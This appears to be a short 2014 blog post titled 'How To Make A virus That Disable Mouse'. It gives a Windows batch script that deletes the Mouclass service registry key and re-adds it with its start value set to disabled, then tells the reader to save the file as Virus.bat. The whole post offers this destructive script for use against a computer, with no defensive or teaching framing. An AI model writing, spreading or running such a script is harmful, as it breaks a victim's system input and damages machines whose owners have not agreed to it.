Tuesday, 7 January 2014

How To Make A virus That Disable Mouse

                            



1. Open your notepad and write down the following code....

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4h
rem ---------------------------------


2.Save the file as Virus.bat

3.Your done .....Now you have just created a virus to disable mouse.

No comments:

Post a Comment